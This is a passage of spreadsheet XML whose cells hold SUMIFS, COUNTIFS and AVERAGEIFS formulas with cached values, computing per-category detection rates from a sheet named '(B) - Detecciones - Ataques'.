        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; K$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, K$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; K$21 &amp; "*"
    )
)
</f>
        <v>0.7222222222</v>
      </c>
      <c r="L22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, L$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; L$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, L$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; L$21 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="M22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, M$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; M$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, M$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; M$21 &amp; "*"
    )
)
</f>
        <v>0.7142857143</v>
      </c>
      <c r="N22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, N$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; N$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, N$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; N$21 &amp; "*"
    )
)
</f>
        <v>0.6</v>
      </c>
      <c r="O22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, O$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; O$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, O$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; O$21 &amp; "*"
    )
)
</f>
        <v>0.3684210526</v>
      </c>
      <c r="P22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, P$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; P$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, P$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; P$21 &amp; "*"
    )
)
</f>
        <v>0.6153846154</v>
      </c>
      <c r="Q22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Q$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Q$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Q$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Q$21 &amp; "*"
    )
)
</f>
        <v>0.6111111111</v>
      </c>
      <c r="R22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, R$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; R$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, R$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; R$21 &amp; "*"
    )
)
</f>
        <v>0.6</v>
      </c>
      <c r="S22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$21 &amp; "*"
    )
)
</f>
        <v>0.2012371907</v>
      </c>
      <c r="T22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$21 &amp; "*"
    )
)
</f>
        <v>0.6</v>
      </c>
      <c r="U22" s="646">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$21 &amp; "*"
    )
)
</f>
        <v>0.3181818182</v>
      </c>
      <c r="W22" s="644" t="s">
        <v>2671</v>
      </c>
      <c r="X22" s="667">
        <f>IF(X17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,X21))</f>
        <v>0.03759030022</v>
      </c>
      <c r="Y22" s="667">
        <f>IF(Y17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,Y21))</f>
        <v>1</v>
      </c>
      <c r="Z22" s="667">
        <f>IF(Z17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,Z21))</f>
        <v>0</v>
      </c>
      <c r="AA22" s="667">
        <f>IF(AA17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AA21))</f>
        <v>0</v>
      </c>
      <c r="AB22" s="667">
        <f>IF(AB17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AB21))</f>
        <v>0.05366134369</v>
      </c>
      <c r="AC22" s="667" t="str">
        <f>IF(AC17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AC21))</f>
        <v>-</v>
      </c>
      <c r="AD22" s="667" t="str">
        <f>IF(AD17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AD21))</f>
        <v>-</v>
      </c>
      <c r="AE22" s="667" t="str">
        <f>IF(AE17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AE21))</f>
        <v>-</v>
      </c>
      <c r="AF22" s="667">
        <f>IF(AF17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AF21))</f>
        <v>1</v>
      </c>
      <c r="AG22" s="667">
        <f>IF(AG17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AG21))</f>
        <v>0.5</v>
      </c>
      <c r="AH22" s="667" t="str">
        <f>IF(AH17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AH21))</f>
        <v>-</v>
      </c>
      <c r="AI22" s="667">
        <f>IF(AI17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI21))</f>
        <v>1</v>
      </c>
      <c r="AJ22" s="667">
        <f>IF(AJ17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ21))</f>
        <v>1</v>
      </c>
      <c r="AK22" s="667">
        <f>IF(AK17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK21))</f>
        <v>1</v>
      </c>
      <c r="AL22" s="667" t="str">
        <f>IF(AL17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL21))</f>
        <v>-</v>
      </c>
      <c r="AM22" s="667">
        <f>IF(AM17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM21))</f>
        <v>0.8888888889</v>
      </c>
      <c r="AN22" s="667" t="str">
        <f>IF(AN17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN21))</f>
        <v>-</v>
      </c>
      <c r="AO22" s="667">
        <f>IF(AO17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO21))</f>
        <v>1</v>
      </c>
      <c r="AP22" s="667">
        <f>IF(AP17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP21))</f>
        <v>0</v>
      </c>
      <c r="AQ22" s="667" t="str">
        <f>IF(AQ17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ21))</f>
        <v>-</v>
      </c>
      <c r="AR22" s="667">
        <f>IF(AR17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR21))</f>
        <v>0.6666666667</v>
      </c>
      <c r="AS22" s="667" t="str">
        <f>IF(AS17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS21))</f>
        <v>-</v>
      </c>
      <c r="AT22" s="667">
        <f>IF(AT17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT21))</f>
        <v>0</v>
      </c>
      <c r="AU22" s="667">
        <f>IF(AU17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU21))</f>
        <v>1</v>
      </c>
      <c r="AV22" s="667">
        <f>IF(AV17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV21))</f>
        <v>1</v>
      </c>
      <c r="AW22" s="667">
        <f>IF(AW17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW21))</f>
        <v>1</v>
      </c>
      <c r="AX22" s="667">
        <f>IF(AX17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX21))</f>
        <v>0</v>
      </c>
      <c r="AY22" s="667">
        <f>IF(AY17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY21))</f>
        <v>1</v>
      </c>
      <c r="AZ22" s="667">
        <f>IF(AZ17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ21))</f>
        <v>1</v>
      </c>
      <c r="BA22" s="667">
        <f>IF(BA17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA21))</f>
        <v>1</v>
      </c>
      <c r="BB22" s="667">
        <f>IF(BB17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB21))</f>
        <v>0.3</v>
      </c>
      <c r="BC22" s="667">
        <f>IF(BC17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC21))</f>
        <v>0.375</v>
      </c>
      <c r="BD22" s="667" t="str">
        <f>IF(BD17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD21))</f>
        <v>-</v>
      </c>
      <c r="BE22" s="667" t="str">
        <f>IF(BE17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE21))</f>
        <v>-</v>
      </c>
      <c r="BF22" s="667">
        <f>IF(BF17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF21))</f>
        <v>1</v>
      </c>
      <c r="BG22" s="667" t="str">
        <f>IF(BG17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG21))</f>
        <v>-</v>
      </c>
      <c r="BH22" s="667">
        <f>IF(BH17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH21))</f>
        <v>0</v>
      </c>
      <c r="BI22" s="667">
        <f>IF(BI17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI21))</f>
        <v>1</v>
      </c>
      <c r="BJ22" s="667" t="str">
        <f>IF(BJ17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ21))</f>
        <v>-</v>
      </c>
      <c r="BK22" s="667">
        <f>IF(BK17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK21))</f>
        <v>0</v>
      </c>
      <c r="BL22" s="667">
        <f>IF(BL17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL21))</f>
        <v>1</v>
      </c>
      <c r="BM22" s="667" t="str">
        <f>IF(BM17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM21))</f>
        <v>-</v>
      </c>
      <c r="BN22" s="667">
        <f>IF(BN17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN21))</f>
        <v>1</v>
      </c>
      <c r="BO22" s="667">
        <f>IF(BO17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO21))</f>
        <v>0</v>
      </c>
      <c r="BP22" s="667" t="str">
        <f>IF(BP17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP21))</f>
        <v>-</v>
      </c>
      <c r="BQ22" s="667">
        <f>IF(BQ17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ21))</f>
        <v>0</v>
      </c>
      <c r="BR22" s="667">
        <f>IF(BR17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR21))</f>
        <v>1</v>
      </c>
      <c r="BS22" s="667">
        <f>IF(BS17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS21))</f>
        <v>1</v>
      </c>
      <c r="BT22" s="667" t="str">
        <f>IF(BT17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT21))</f>
        <v>-</v>
      </c>
      <c r="BU22" s="667">
        <f>IF(BU17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU21))</f>
        <v>0</v>
      </c>
      <c r="BV22" s="667">
        <f>IF(BV17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV21))</f>
        <v>1</v>
      </c>
      <c r="BW22" s="667">
        <f>IF(BW17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW21))</f>
        <v>0</v>
      </c>
      <c r="BX22" s="667">
        <f>IF(BX17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX21))</f>
        <v>1</v>
      </c>
      <c r="BY22" s="667">
        <f>IF(BY17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY21))</f>
        <v>0</v>
      </c>
      <c r="BZ22" s="667">
        <f>IF(BZ17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ21))</f>
        <v>0</v>
      </c>
      <c r="CA22" s="667" t="str">
        <f>IF(CA17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA21))</f>
        <v>-</v>
      </c>
      <c r="CB22" s="667">
        <f>IF(CB17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB21))</f>
        <v>1</v>
      </c>
      <c r="CC22" s="667">
        <f>IF(CC17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC21))</f>
        <v>1</v>
      </c>
      <c r="CD22" s="667">
        <f>IF(CD17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD21))</f>
        <v>1</v>
      </c>
      <c r="CE22" s="667">
        <f>IF(CE17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE21))</f>
        <v>0</v>
      </c>
      <c r="CF22" s="667">
        <f>IF(CF17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF21))</f>
        <v>0</v>
      </c>
      <c r="CG22" s="667" t="str">
        <f>IF(CG17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG21))</f>
        <v>-</v>
      </c>
      <c r="CH22" s="667">
        <f>IF(CH17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH21))</f>
        <v>0.5000989647</v>
      </c>
      <c r="CI22" s="667">
        <f>IF(CI17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI21))</f>
        <v>0.005988023952</v>
      </c>
      <c r="CJ22" s="667" t="str">
        <f>IF(CJ17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ21))</f>
        <v>-</v>
      </c>
      <c r="CK22" s="667">
